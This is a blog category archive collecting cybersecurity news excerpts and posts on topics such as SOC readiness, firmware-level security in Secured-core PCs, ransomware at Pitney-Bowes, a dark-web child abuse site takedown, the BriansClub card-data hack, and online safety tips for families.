Category Archives: Cybersecurity

Why organizations must arm their SOCs for the future

Security Operations Centers (SOCs) around the globe represent the first line of defense between enterprises and cyber-threats. This mission requires that SOCs respond to security alerts around the clock, and jump into action as quickly as possible to minimize the damage done from events that are in progress while keeping the uptime of critical operations in accordance to the SLAs. The importance of SOCs are highlighted by the fact that 30% of CEOs rate cyber-threats … More

The post Why organizations must arm their SOCs for the future appeared first on Help Net Security.

Perceptions on the impact of data breaches and identity protection

4iQ recently completed research focusing on Americans’ attitudes about cybersecurity breaches and the efforts that organizations make to mitigate breaches’ effects on identity theft. Where’s the data? The findings indicate that a large proportion of Americans (44%) believe their personally identifiable information (PII) has been stolen as a result of a data breach. A strong majority (63%) are concerned that prior breaches could lead to future identity fraud, and a significant number (37%) believe they … More

The post Perceptions on the impact of data breaches and identity protection appeared first on Help Net Security.

How the under 30s expect new approaches to cybersecurity

In today’s multigenerational workforce, the over-30s are more likely to adopt cybersecurity good practice than their younger colleagues who have grown up with digital technology. This is according to a report on generational attitudes to cybersecurity from the security division of NTT. The report identified good and bad practice for organizations researched as part of its Risk:Value 2019 report, scored across 17 key criteria. This revealed that under-30s score 2.3 in terms of cybersecurity best … More

The post How the under 30s expect new approaches to cybersecurity appeared first on Help Net Security.

“Gilmore Girls” Actress Alexis Bledel Is McAfee’s Most Dangerous Celebrity 2019

You probably know Alexis Bledel from her role as the innocent book worm Rory Gilmore in network television’s “Gilmore Girls” or as shy, quiet Lena Kaligaris in the “Sisterhood of the Travelling Pants” movies. But her most recent role as Ofglen in Hulu’s acclaimed “The Handmaid’s Tale” took a bit of a darker turn. And while Bledel made this dramatic on-screen transition, her rising stardom has in turn made her a prime target for malicious search results online, leading to her coming in at the top of McAfee’s 2019 Most Dangerous Celebrities list.

For the thirteenth year in a row, McAfee researched famous individuals to reveal the riskiest celebrity to search for online or whose search results could expose fans to malicious content. Bledel is joined in the top ten most dangerous celebrities by fellow actresses Sophie Turner (No. 3), Anna Kendrick (No. 4), Lupita Nyong’o (No. 5), and Tessa Thompson (No. 10). Also included in the top ten list are late night talk show hosts James Corden (No. 2) and Jimmy Fallon (No. 6). Rounding out the rest of the top ten are martial arts master Jackie Chan (No. 7) and rap artists Lil Wayne (No. 8) and Nicki Minaj (No. 9).

Many users don’t realize that simple internet searches of their favorite celebrities could potentially lead to malicious content, as cybercriminals often leverage these popular searches to entice users to click on dangerous links. This year’s study emphasizes that today’s streaming culture doesn’t exactly protect users from cybercriminals. For example, Alexis Bledel and Sophie Turner are strongly associated with searches including the term “torrent,” indicating that many fans of “The Handmaid’s Tale” and “Game of Thrones” have been pursuing free options to avoid subscription fees. However, users must understand that torrent or pirated downloads can open themselves up to an abundance of cyberthreats.

So, whether you’re checking out what Alexis Bledel has been up to since “Gilmore Girls” or searching for the latest production of James Corden’s “Crosswalk the Musical,” be a proactive fan and follow these security tips when browsing the internet:

  • Be careful what you click. Users looking for information on their favorite celebrities should be cautious and only click on links to reliable sources for downloads. The safest thing to do is to wait for official releases instead of visiting third-party websites that could contain malware.
  • Refrain from using illegal streaming sites. When it comes to dangerous online behavior, using illegal streaming sites could wreak havoc on your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do yourself a favor and stream the show from a reputable source.
  • Protect your online safety with a cybersecurity solution. Safeguard yourself from cybercriminals with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats.
  • Use a website reputation tool. Use a website reputation tool such as McAfee WebAdvisor, which alerts users when they are about to visit a malicious site.
  • Use parental control software. Kids are fans of celebrities too, so ensure that limits are set for your child on their devices and use parental control software to help minimize exposure to potentially malicious or inappropriate websites.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post “Gilmore Girls” Actress Alexis Bledel Is McAfee’s Most Dangerous Celebrity 2019 appeared first on McAfee Blogs.

Targeted online messaging dissuading young gamers from getting involved in cybercrime

Highly-targeted messaging campaigns from law enforcement can be surprisingly effective at dissuading young gamers from getting involved in cybercrime, a new study has suggested. Law enforcement interventions The study, by researchers from the University of Cambridge and University of Strathclyde, looked at four different types of law enforcement interventions, the first evaluation of the their effectiveness for this particular type of cybercrime. They found that while high-profile arrests and sentencing of cybercriminals only lead to … More

The post Targeted online messaging dissuading young gamers from getting involved in cybercrime appeared first on Help Net Security.

In the Workplace, Safety Is Sexy. And It All Starts With Your HR Department

Maintaining workplace safety can seem like a rare form of torture–videos and quizzes and talks and such. For most of us, it’s a necessary chore. But despite the looks among employees with each new H.R. training session, the work that happens in those conference rooms at least in theory translates to profits.

The inoculation process of onboarding a new hire is profoundly important to the proper functioning of any organization. Never before have there been more actionable sensitivities and special needs, all of them calling for empathy and action in the workplace. Safety is important. People don’t work well when they don’t feel secure.

Creating an environment where employees feel safe takes many forms: It can be as simple as the correct placement of fire extinguishers, smoke detectors and alarms and/or providing employees with tips for monitor placement, or it can involve shock-absorbent flooring. Of course, it also involves the establishment and policing of an organization’s social and cultural norms. Google has taken this to the next level with its steps to ensure psychological safety to prevent employees in teams from feeling insecure or embarrassed. (If the company’s utter dominance in nearly every Internet-related field is any indicator, the strategy seems to be working out for them.)

Notwithstanding the Google example, it would be a stretch–and possibly an actionable H.R. error–to describe as “sexy” the various manifestations of workplace best-practices.

H.R. departments are in the business of minimizing the use of trigger words. When someone in the room says that this or that profitable situation is “sexy” there are other words that can carry the same amount of water–for instance, “exciting” or “awesome.” Basically, that word, for some demographic types, means “super cool,” and can be applied to the purchase of a new car, a new smartphone or bagging a multi-million dollar contract. No champagne, no smoke machine.

Enter Tall, Dark and Cyber Safe

Where cybersecurity is concerned, many employees have a sort of click and pray approach. It is not a method that inspires a great feeling of security. Add to that the reality of doing business today. Businesses and employees alike live under constant threat of the fallout from someone–maybe even the child of an employee that brings their own devices to work–clicking on the wrong link, opening the wrong attachment or mistakenly creating an unsecured database containing sensitive information.

The cause of the next corporation-killing megabreach could be on any machine in the workplace just waiting for an uninformed or distracted employee to activate it. The answer is in the H.R. department: cyber is a cultural issue. One of the norms of any properly functioning organization must be the propagation of a culture of cybersecurity. A growing trend in employment benefits is employee-paid or voluntary cyber awareness programs coupled with identity theft resolution and identity monitoring services.

The numbers are grim. Eighty percent of businesses expect to experience a data breach before the end of 2019, and more than half of small and mid-size businesses were breached last year (and that’s just the organizations that are aware something happened). Meanwhile, the cost of a breach keeps climbing steadily, especially when lost customers, fines, and lawsuits are added to the total.

It’s an all too common scenario: undersized and demoralized IT departments sprint from one crisis to another, while H.R. departments fail to grok that cyber vulnerabilities are an existential threat on par with a gas leak in the office breakroom. The overlap between workplace safety and cyber safety is significant–in fact they belong under the same rubric: Safety. At issue too often is the failure of an organization to identify cyber vulnerabilities and then deploy H.R. to train them into submission, thus minimizing the exposure.

The 3 Ms for Business

Minimize Your Risk of Exposure: Put resources into training your staff to recognize phishing scams and to practice good cyber hygiene. Vet contractors and vendors based on their security practices to minimize supply chain risk. Consider requiring employees to log in to a VPN (virtual private network), especially if they’re connecting to the company network remotely. It’s often the sloppiest of mistakes that give hackers access to your business. Training and sound cybersecurity policies can fill in the gaps where technology often fails.

Monitor Everything: Establish a policy at your business about transferring funds; in the era of deepfakes, it’s important to know who is likely to request access to money, and how it should be handled. Always double check by getting confirmation on the phone. All systems can introduce vulnerabilities, especially the introduction of new technology. Create a culture where employees know that if they see something, they will be rewarded for saying something. Cybersecurity is a team sport.

Manage the Damage: When it comes to a compromise of your company’s identity, honesty is the best policy. Own up to a data breach as quickly as possible (especially if you are subject to the GDPR’s 72 hour requirement), be transparent about lapses in security, and review any policies that allowed the compromise to occur in the first place. Jack Dorsey’s Twitter hack may have been embarrassing, but the company moved quickly to close the security loophole that allowed it to happen. Perhaps most important, have some empathy. Cyber-fails are scary. Remember, your news might be more traumatic for your customers or clients than it is for you, and act accordingly.

If safety isn’t the most exciting thing on earth, profitability is, and any company that doesn’t devote significant resources to keeping employees current on the cyber-front will at some point have to ditch productivity (and with that profits) while their most valuable resource–humans working for them–recover, and bear in mind, that can take a very un-sexy 100-200 hours.

The post In the Workplace, Safety Is Sexy. And It All Starts With Your HR Department appeared first on Adam Levin.

Microsoft and partners design new device security requirements to protect against targeted firmware attacks

Recent developments in security research and real-world attacks demonstrate that as more protections are proactively built into the OS and in connected services, attackers are looking for other avenues of exploitation with firmware emerging as a top target. In the last three years alone, NIST’s National Vulnerability Database has shown nearly a five-fold increase in the number of firmware vulnerabilities discovered.

To combat threats specifically targeted at the firmware and operating system levels, we’re announcing a new initiative we’ve been working on with partners to design what we call Secured-core PCs. These devices, created in partnership with our PC manufacturing and silicon partners, meet a specific set of device requirements that apply the security best practices of isolation and minimal trust to the firmware layer, or the device core, that underpins the Windows operating system. These devices are designed specifically for industries like financial services, government and healthcare, and for workers that handle highly-sensitive IP, customer or personal data, including PII as these are higher value targets for nation-state attackers.

 

In late 2018, security researchers discovered that hacking group, Strontium has been using firmware vulnerabilities to target systems in the wild with malware delivered through a firmware attack. As a result, the malicious code was hard to detect and difficult to remove – it could persist even across common cleanup procedures like an OS re-install or a hard drive replacement.

Why attackers and researchers are devoting more effort toward firmware

Firmware is used to initialize the hardware and other software on the device and has a higher level of access and privilege than the hypervisor and operating system kernel thereby making it an attractive target for attackers. Attacks targeting firmware can undermine mechanisms like secure boot and other security functionality implemented by the hypervisor or operating system making it more difficult to identify when a system or user has been compromised. Compounding the problem is the fact that endpoint protection and detection solutions have limited visibility at the firmware layer given that they run underneath of the operating system, making evasion easier for attackers going after firmware.

What makes a Secured-core PC?

Secured-core PCs combine identity, virtualization, operating system, hardware and firmware protection to add another layer of security underneath the operating system. Unlike software-only security solutions, Secured-core PCs are designed to prevent these kinds of attacks rather than simply detecting them. Our investments in Windows Defender System Guard and Secured-core PC devices are designed to provide the rich ecosystem of Windows 10 devices with uniform assurances around the integrity of the launched operating system and verifiable measurements of the operating system launch to help mitigate against threats taking aim at the firmware layer. These requirements enable customers to boot securely, protect the device from firmware vulnerabilities, shield the operating system from attacks, prevent unauthorized access to devices and data, and ensure that identity and domain credentials are protected.

The built-in measurements can be used by SecOps and IT admins to remotely monitor the health of their systems using System Guard runtime attestation and implement a zero-trust network rooted in hardware. This advanced firmware security works in concert with other Windows features to ensure that Secured-core PCs provide comprehensive protections against modern threats.

 

Removing trust from the firmware

Starting with Windows 8, we introduced Secure Boot to mitigate the risk posed by malicious bootloaders and rootkits that relied on Unified Extensible Firmware Interface (UEFI) firmware to only allow properly signed bootloaders like the Windows boot manager to execute. This was a significant step forward to protect against these specific types of attacks. However, since firmware is already trusted to verify the bootloaders, Secure Boot on its own does not protect from threats that exploit vulnerabilities in the trusted firmware. That’s why we worked with our partners to ensure these new Secured-core capabilities are shipped in devices right out of the box.

Using new hardware capabilities from AMD, Intel, and Qualcomm, Windows 10 now implements System Guard Secure Launch as a key Secured-core PC device requirement to protect the boot process from firmware attacks. System Guard uses the Dynamic Root of Trust for Measurement (DRTM) capabilities that are built into the latest silicon from AMD, Intel, and Qualcomm to enable the system to leverage firmware to start the hardware and then shortly after re-initialize the system into a trusted state by using the OS boot loader and processor capabilities to send the system down a well-known and verifiable code path. This mechanism helps limit the trust assigned to firmware and provides powerful mitigation against cutting-edge, targeted threats against firmware. This capability also helps to protect the integrity of the virtualization-based security (VBS) functionality implemented by the hypervisor from firmware compromise. VBS then relies on the hypervisor to isolate sensitive functionality from the rest of the OS which helps to protect the VBS functionality from malware that may have infected the normal OS even with elevated privileges. Protecting VBS is critical since it is used as a building block for important OS security capabilities like Windows Defender Credential Guard which protects against malware maliciously using OS credentials and Hypervisor-protected Code Integrity (HVCI) which ensures that a strict code integrity policy is enforced and that all kernel code is signed and verified.

 

Being able to measure that the device booted securely is another critical piece of this additional layer of protection from firmware compromise that gives admins added confidence that their endpoints are safe. That’s why we implemented Trusted Platform Module 2.0 (TPM) as one of the device requirements for Secured-core PCs. By using the Trusted Platform Module 2.0 (TPM) to measure the components that are used during the secure launch process, we help customers enable zero trust networks using System Guard runtime attestation. Conditional access policies can be implemented based on the reports provided by the System Guard attestation client running in the isolated VBS environment.

In addition to the Secure Launch functionality, Windows implements additional safeguards that operate when the OS is running to monitor and restrict the functionality of potentially dangerous firmware functionality accessible through System Management Mode (SMM).

Beyond the hardware protection of firmware featured in Secured-core PCs, Microsoft recommends a defense-in-depth approach including security review of code, automatic updates, and attack surface reduction. Microsoft has provided an open-source firmware project called Project-Mu that PC manufactures can use as a starting point for secure firmware.

How to get a Secured-core PC

Our ecosystem partnerships have enabled us to add this additional layer of security in devices that are designed for highly-targeted industries and end-users who handle mission-critical data in some of the most data-sensitive industries like government, financial services, and healthcare, right-out-of-the-box. These innovations build on the value of Windows 10 Pro that comes with built-in protections like firewall, secure boot, and file-level information-loss protection which are standard on every device.

More information on devices that are verified Secured-core PC including those from Dell, Dynabook, HP, Lenovo, Panasonic and Surface can be found on our web page.

 

David Weston (@dwizzzleMSFT)
Partner Director, OS Security

The post Microsoft and partners design new device security requirements to protect against targeted firmware attacks appeared first on Microsoft Security.

South Korean Administration Arrested Feds Shut Down The largest Dark Web Child Abuse Site

Today the Department of Justice of the United States said that they had arrested hundreds of criminals during a global attack after downgrading the largest known children’s porn site in the dark web and tracking bitcoin payments.

With an international coalition of law enforcement agencies, federal officials arrested Jong Woo Son of South Korea, a 23-year-old child sexual abuse site operator, and 337 suspects who are suspected of knowingly using the site.

It worked between June 2015 and March 2018 and hosted over 250,000 sexual exploitation videos of children, children and adults, comprising about more than 8 TB of information, “Welcome to Video.”

The Welcome to Video website has more than 250,000 unique videos according to a press release released by DoJ, and almost 45 percent of the videos feature new images that were not recognized before.

The operation also saved at least 23 children residing in the USA, Spain and the United Kingdom who were actively abused by Welcome to Video users on the encrypted Tor network.

Website Hosted from the admin’s bedroom on a computer

Just by analyzing the HTML website source code in the app, the initial IP addresses of the server on which the page was hosted have been exposed.

The IP addresses were then tracked back to a server in Jong Woo Son’s house in South Korea in the site bedroom.

The research on the confiscated server showed that the website had a capacity of at least one million users and more than one million unique bitcoin addresses used to receive payments from visitors.

In February 2018, the United States issued a warrant for Son’s arrest. The South Korean federal authorities then detained him on 5 March 2018 and seized the Welcome to Video file.

While Son is now serving an 18-month sentence in South Korea, just yesterday a federal jury at Washington DC unsealed a 9-count charge against him with the U.S. authorities seeking his extradition before the courts.

“Websites benefiting from child sexual exploitation are amongst the most vile, reprehensible types of crime,” said Deputy Prosecutor General Brian A. Benczkowski of the Criminal Division of the Department of Justice.

The today announcement is shown that the Department of Justice is strongly committed to working closely with our allies in South Korea and around the world to rescue the victims of child abuse and bring the perpetrators of these abominable crimes to justice.

Over 337 clients of the website have also been charged and prosecuted 

Users of the website, from the U.S., UK, South Korea, Canada, Saudi Arabia, UAE, Ireland, Germany, Czech Republic, Spain, Brazil and Australia, can download new videos, referrals to new users, or pay for them in Bitcoin crypto-currency “supposedly anonymous.”

According to the indictment, at least two former federal enforcement officers allegedly participated in the child porn site— Paul Casey Whipple, 35 years-old United States. Border Patrol agent and former HSI agent Richard Nikolai Gratkowski.

Furthermore, two users of the Welcome to the Video dark market committed suicide after search warrants were executed.

“Welcome to Video provided these videos for sale using bitcoin cryptocurrency. Usually, this kind of websites give users a forum to exchange these images. This Darknet website is one of the first of its kind to monetize children’s videos with bitcoin,” said the press release.

The platform received at least 420 BTC during its 3 years of operation, which amounted to $370,000 at the time the site has been deleted, through at least 7300 transactions.

The post South Korean Administration Arrested Feds Shut Down The largest Dark Web Child Abuse Site appeared first on .

How cybersecurity accelerates business growth

It’s no secret that the cybersecurity industry has grown exponentially over more than a decade due to the proliferation of high-profile cybercrime. Viewing cybersecurity as simply a necessary step to mitigate cyber risk leaves much opportunity on the table. Organizational leaders need to see cybersecurity as a business enabler that can accelerate growth. Companies that view cybersecurity with the myopic lens of being a necessary overhead cost to protect data are losing out on opportunities … More

The post How cybersecurity accelerates business growth appeared first on Help Net Security.

Deepfakes and voice as the next data breach

Deepfake technology, which uses deep learning to create fake or altered video and audio content, continues to pose a major threat to businesses, consumers, and society as a whole. In the lead up to the 2020 U.S. presidential election, government officials have expressed concerns about potential deepfake attacks to spread misinformation, and evidence suggests that while this technology is advancing rapidly, governments and tech companies are still ill-prepared to detect and combat it. Deepfakes caught … More

The post Deepfakes and voice as the next data breach appeared first on Help Net Security.

Spending on security hardware, software, and services continues to increase

Worldwide spending on security products and services will enjoy solid growth over the next five years as organizations continue to invest in solutions to meet a wide range of security threats and requirements. According to an updated forecast from the IDC, worldwide spending on security-related hardware, software, and services will be $106.6 billion in 2019, an increase of 10.7% over 2018. This amount will reach $151.2 billion in 2023 with a compound annual growth rate … More

The post Spending on security hardware, software, and services continues to increase appeared first on Help Net Security.

Want Your Kids to Care More About Online Safety? Try These 7 Tips

The topics parents need to discuss with kids today can be tough compared to even a few years ago. The digital scams are getting more sophisticated and the social culture poses new, more inherent risks. Weekly, we have to breach very adult conversations with our kids. Significant conversations about sexting, bullying, online scams, identity fraud, hate speech, exclusion, and sextortion — all have to be covered but we have to do it in ways that matter to kids.

With 95% of teens now having access to a smartphone and 45% online ”almost constantly,” it’s clear we can’t monitor conversations, communities, and secret apps around the clock. So the task for parents is to move from a mindset of ”protect” to one of ”prepare” if we hope to get kids to take charge of their privacy and safety online.

Here are a few ideas on how to get these conversations to stick.

  1. Bring the headlines home. A quick search of your local or regional headlines should render some examples of kids who have risked and lost a lot more than they imagined online. Bringing the headlines closer to home — issues like reputation management, sex trafficking, kidnapping, sextortion, and bullying — can help your child personalize digital issues. Discussing these issues with honesty and openness can bring the reality home that these issues are real and not just things that happen to other people.
  2. Netflix and discuss. Hollywood has come a long way in the last decade in making films for tweens and teens that spotlight important digital issues. Watching movies together is an excellent opportunity to deepen understanding and spark conversation about critical issues such as cyberbullying, teen suicide, sextortion, catfishing, stalking, and examples of personal courage and empathy for others. Just a few of the movies include Cyberbully, 13 Reasons Why (watch with a parent), Eighth Grade, Searching, Bully, Disconnect. Character building movies: Dumplin’, Tall Girl, Wonder, Girl Rising, The Hate U Give, Mean Girls, and the Fat Boy Chronicles, among many others.
  3. Remove phones. Sometimes absence makes that heart grow appreciative, right? Owning a phone (or any device) isn’t a right. Phone ownership and internet access is a privilege and responsibility. So removing a child’s phone for a few days can be especially effective if your child isn’t listening or exercising wise habits online. One study drives this phone-dependency home. Last year researchers polled millennials who said they’d rather give up a finger than their smartphones. So, this tactic may prove to be quite effective.
  4. Define community. Getting kids to be self-motivated about digital safety and privacy may require a more in-depth discussion on what “community” means. The word is used often to describe social networks, but do we really know and trust people in our online “communities?” No. Ask your child what qualities he or she values in a friend and who they might include in a trusted community. By defining this, kids may become more aware of who they are letting in and what risks grow when our digital circles grow beyond trusted friends.
  5. Assume they are swiping right. Dating has changed dramatically for tweens and teens. Sure there are apps like MeetMe and Tinder that kids explore, but even more popular ways to meet a significant other are everyday social networks like Snapchat, WhatsApp, and Instagram, where kids can easily meet “friends of friends” and start “talking.” Study the pros and cons of these apps. Talk to your kids about them and stress the firm rule of never meeting with strangers.
  6. Stay curious. Stay interested. If you, as a parent, show little interest in online risks, then why should your child? By staying curious and current about social media, apps, video games, your kids will see that you care about — and can discuss — the digital pressures that surround them every day. Subscribe to useful family safety and parenting blogs and consider setting up Google Alerts around safety topics such as new apps, teens online, and online scams.
  7. Ask awesome questions. We know that lectures and micromanaging don’t work in the long run, so making the most of family conversations is critical. One way to do this is to ask open-ended questions such as “What did you learn from this?” “What do you like or dislike about this app?” “Have you ever felt unsafe online?” and “How do you handle uncomfortable or creepy encounters online?” You might be surprised at where the conversations can go and the insight you will gain.

Make adjustments to your digital parenting approach as needed. Some things will work, and others may fall flat. The important thing is to keep conversation a priority and find a rhythm that works for your family. And don’t stress: No one has all the answers, no one is a perfect parent. We are all learning a little more each day and doing the best we can to keep our families safe online.

Be Part of Something Big

October is National Cybersecurity Awareness Month (NCSAM). Become part of the effort to make sure that our online lives are as safe and secure as possible. Use the hashtags #CyberAware, #BeCyberSafe, and #NCSAM to track the conversation in real-time.

The post Want Your Kids to Care More About Online Safety? Try These 7 Tips appeared first on McAfee Blogs.

Pitney-Bowes the Target of Ransomware

U.S. mailing services company Pitney-Bowes experienced services outages after a ransomware attack earlier this week.

“It has been confirmed that our systems have been affected by a malware attack that encrypted information on some systems and disrupted client access to our services. Our technical and operational teams are making progress to restore the affected systems. At this time, the company has seen no evidence that customer or employee data has been improperly accessed,” the company announced in a statement.

Pitney-Bowes reported that the cyberattack had deployed the Ryuk virus, a ransomware program used in recent attacks on several U.S. cities and companies, including Arizona Beverages and Tribune Publishing.  

In response to the incident, business credit rating agency Moody’s issued a “credit negative” event note to Pitney-Bowes, which means the company will be under increased scrutiny from credit agencies, and that further cybersecurity incidents could lead to negative, long term financial repercussions.

The attack on Pitney-Bowes comes on the heels of a warning issued by the FBI to businesses about the increased threat posed by “high impact” ransomware campaigns.

The post Pitney-Bowes the Target of Ransomware appeared first on Adam Levin.

What to consider before investing in Cloud Security Competency?

Estimated reading time: 2 minutes

American market research giant Forrester estimated in 2017 that the value of the public cloud market would reach at least $191 billion by 2020. This surge in the valuation is driven by the growing acceptance of cloud computing by enterprises in this decade.

Organizations are increasingly embracing doing business on the cloud for the various advantages it offers. They are attracted by the fact that cloud computing offers a way to reduce costs in their information technology department by eliminating physical infrastructure and leveraging the cloud solution provider’s resources.

Cloud computing offers many benefits

By hosting the business on the cloud, enterprises can be leaner and more flexible, with employees being able to access essential data, information and applications from wherever they travel. In summation, the next decade will see many more enterprises move to the cloud as we enter the era of the gig economy.

However, there continues to remain legitimate concerns about the security of cloud computing which inhibits many enterprises from exploring this course of action. By moving to the cloud, enterprises do embrace flexibility but also open themselves up to a whole new set of cybersecurity challenges, involving:

The possibility of a data breach

When enterprise data is stored in the cloud, there are fears about the possible repercussions of a data breach. Since the data is stored on a cloud provided by a third-party provider, questions are always asked about the downtime involved and the backup methods used.

The question of compliance

Enterprises from different sectors have to grapple with various regulations on the storage of data. This is a problem that gets compounded when it comes to storing such data on the cloud.

Hacked interfaces and APIs

Almost all cloud services now provide APIs (Application Programming Interface) – APIs are required by organizations to manage and interact with the cloud service they are using. Therefore, the security of the cloud service largely depends on the security of APIs. These are the most vulnerable part of the system as they are directly exposed and are accessible via the Internet.

It’s these security considerations that are major factors for an enterprise looking for competency before investing in the cloud. Before shortlisting a cloud security provider, enterprises should consider the following pointers:

Multi-factor authentication

Enterprises must check whether their cloud security provider provides the functionality of multi-factor authentication. As mentioned earlier, data breaches pose a significant threat to cloud computing but turning on multi-factor authentication is a credible defence against this threat.

Access control

Working on a cloud environment does not take away the threat of insider breaches. To protect an enterprise from insider threats, cloud security must also provide access control functionality, limiting the access users have to the system.

Data storage

Before investing in cloud security, enterprises must be aware of how their data is being stored in the cloud. Whether these are malicious attacks or natural disasters, cloud data should be ideally distributed in multiple locations. This serves business continuity as well as data recovery in case of an unfortunate event.

Offers both security and compliance

An investment in cloud security should enable the enterprise to enjoy both top-of-the-line security and also comply with territorial and global regulations.

The era of cloud computing promises to unlock productivity and efficiency for enterprises, provided they ensure the investment has been made in the correct security competencies. Seqrite Cloud provides an integrated solution that allows the management and regulation of multiple Endpoint Security and UTM products deployed at different geographical locations.

The post What to consider before investing in Cloud Security Competency? appeared first on Seqrite Blog.

Six steps for implementing zero trust access

Modern organizations are no longer governed by fixed perimeters. In fact, the perimeter-based security model is disintegrating in a world where users work on their own devices from anywhere, and sensitive company data is stored in multiple cloud services. Organizations can no longer rely on binary security models that focus on letting good guys in and keeping bad guys out. Their big challenge is figuring out how to give users the access they need while … More

The post Six steps for implementing zero trust access appeared first on Help Net Security.

Security still top priority as more enterprises scale IoT solutions company-wide

A record 61 percent of enterprises worldwide are on the path to becoming “intelligent,” compared to only 49 percent in 2018. The Zebra Technologies Corporation global survey analyzes the extent to which companies connect the physical and digital worlds to drive innovation through real-time guidance, data-powered environments and collaborative mobile workflows. Their “Intelligent Enterprise” Index scores are calculated using 11 criteria that include Internet of Things (IoT) vision, adoption, data management, intelligent analysis and more. … More

The post Security still top priority as more enterprises scale IoT solutions company-wide appeared first on Help Net Security.

As car manufacturers focus on connectivity, hackers begin to exploit flaws

Car manufacturers offer more software features to consumers than ever before, and increasingly popular autonomous vehicles that require integrated software introduce security vulnerabilities. Widespread cloud connectivity and wireless technologies enhance vehicle functionality, safety, and reliability but expose cars to hacking exploits. In addition, the pressure to deliver products as fast as possible puts a big strain on the security capabilities of cars, manufacturing facilities, and automotive data, a IntSights report reveals. “The automotive manufacturing industry … More

The post As car manufacturers focus on connectivity, hackers begin to exploit flaws appeared first on Help Net Security.

Hack-ception: Benign Hacker Rescues 26M Stolen Credit Card Records

There’s something ironic about cybercriminals getting “hacked back.” BriansClub, one of the largest underground stores for buying stolen credit card data, has itself been hacked. According to researcher Brian Krebs, the data stolen from BriansClub encompasses more than 26 million credit and debit card records taken from hacked online and brick-and-mortar retailers over the past four years, including almost eight million records uploaded to the shop in 2019 alone.

Most of the records offered up for sale on BriansClub are “dumps.” Dumps are strings of ones and zeros that can be used by cybercriminals to purchase valuables like electronics, gift cards, and more once the digits have been encoded onto anything with a magnetic stripe the size of a credit card. According to Krebs on Security, between 2015 and 2019, BriansClub sold approximately 9.1 million stolen credit cards, resulting in $126 million in sales.

Back in September, Krebs was contacted by a source who shared a plain text file with what they claimed to be the full database of cards for sale through BriansClub. The database was reviewed by multiple people who confirmed that the same credit card records could also be found in a simplified form by searching the BriansClub website with a valid account.

So, what happens when a cybercriminal, or a well-intentioned hacker in this case, wants control over these credit card records? When these online fraud marketplaces sell a stolen credit card record, that record is completely removed from the inventory of items for sale. So, when BriansClub lost its 26 million card records to a benign hacker, they also lost an opportunity to make $500 per card sold.

What good comes from “hacking back” instances like this? Besides the stolen records being taken off the internet for other cybercriminals to exploit, the data stolen from BriansClub was shared with multiple sources who work closely with financial institutions. These institutions help identify and monitor or reissue cards that show up for sale in the cybercrime underground. And while “hacking back” helps cut off potential credit card fraud, what are some steps users can take to protect their information from being stolen in the first place? Follow these security tips to help protect your financial and personal data:

  • Review your accounts. Be sure to look over your credit card and banking statements and report any suspicious activity as soon as possible.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Consider using identity theft protection. A solution like McAfee Identify Theft Protection will help you to monitor your accounts and alert you of any suspicious activity

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook

The post Hack-ception: Benign Hacker Rescues 26M Stolen Credit Card Records appeared first on McAfee Blogs.

Chapter Preview: Ages 2 to 10 – The Formative Years

As our children venture into toddlerhood, they start to test us a bit. They tug at the tethers we create for them to see just how far they can push us. As they grow and learn, they begin to carve out a vision of the world for themselves—with your guidance, of course, so that they can learn how to live a safe and happy life both now and as they get older.

This is true in the digital world as well.

Typically, at around age two, our kids get their first taste of playing on mommy’s or daddy’s smartphone or tablet and discover an awesome new world of devices and online activities. It’s slow at first—a couple minutes here and there—but, over time, they spend more and more of their day online. You have an opportunity when your child has their first experience with a connected device to set the tone for what’s expected. This is a deliberate teaching moment, the first of many, where you explain how to go safely online and continue to reinforce these behaviors as they grow.

Just as at home and in school, these are children’s formative years in the digital world because there’s a significant increase in their access to devices and online engagement—whether it means watching videos, playing games, interacting with educational software, or many other activities. Keeping them safe in this environment needs to be top of mind, and that includes awareness of how their initial data puddle will rapidly become a data pond during these years. We need to be aware that this pond has direct ties to our privacy, their privacy, and, ultimately, to their life in general.

This chapter of “Is Your Digital Front Door Unlocked?” lays out several topics that, if done in healthy and constructive way, will make your child’s digital journey much more enjoyable. Topics such as the importance of rules, online etiquette, and the notion of “the talk” as it relates to going online safely are discussed in detail, in the hope of providing a framework that will grow as your child grows.

It also looks at challenges that every parent should be aware of, such as cyberbullying and the impact of screen time on your child. It also introduces the risks associated with online gaming for those just getting started.

I can’t express strongly enough the importance of engagement with your child during the formative years. This chapter will give you plenty of ideas of how to go about it in a way that both you and your child will enjoy.

Gary Davis’ book, Is Your Digital Front Door Unlocked?, is available September 5, 2019 and can be ordered at amazon.com.

 

The post Chapter Preview: Ages 2 to 10 – The Formative Years appeared first on McAfee Blogs.

Key challenges impacting IT audit pros navigating an evolving risk landscape

Protiviti and ISACA surveyed 2,252 chief audit executives (CAEs), internal audit professionals and IT audit vice presidents and directors worldwide. Asked to identify their biggest technology challenges, IT audit leaders and professionals noted the following as their top five: IT security and privacy/cybersecurity Data management and governance Emerging technology and infrastructure changes – transformation/innovation/disruption Staffing and skills challenges Third-party/vendor management “As much as organizations are focusing on cybersecurity and protecting their data, they’re still behind … More

The post Key challenges impacting IT audit pros navigating an evolving risk landscape appeared first on Help Net Security.

MSPs face increased risks and opportunities to rethink cybersecurity

Managed service providers (MSPs) and their small-and medium-sized business (SMB) customers lack the tools and resources needed to sufficiently defend against rising cyberattacks and threats, according to Continuum. Security shortcomings The report found significant shortcomings in how MSPs offer cybersecurity, emphasizing the need for both MSPs and their SMB customers to reevaluate their cybersecurity strategies and identify effective solutions to bridge the widening IT skills gap. Conducted by Vanson Bourne, the study surveyed 200 MSPs … More

The post MSPs face increased risks and opportunities to rethink cybersecurity appeared first on Help Net Security.

1 in 5 SMBs have fallen victim to a ransomware attack

Ransomware remains the most common cyber threat to SMBs, according to a Datto survey of more than 1,400 MSP decision makers that manage the IT systems for small-to-medium-sized businesses. SMBs are a prime target While it is used against businesses of all sizes, SMBs have become a prime target for attackers. The report uncovered a number of ransomware trends specifically impacting the SMB market: Ransomware attacks are pervasive. The number of ransomware attacks against SMBs … More

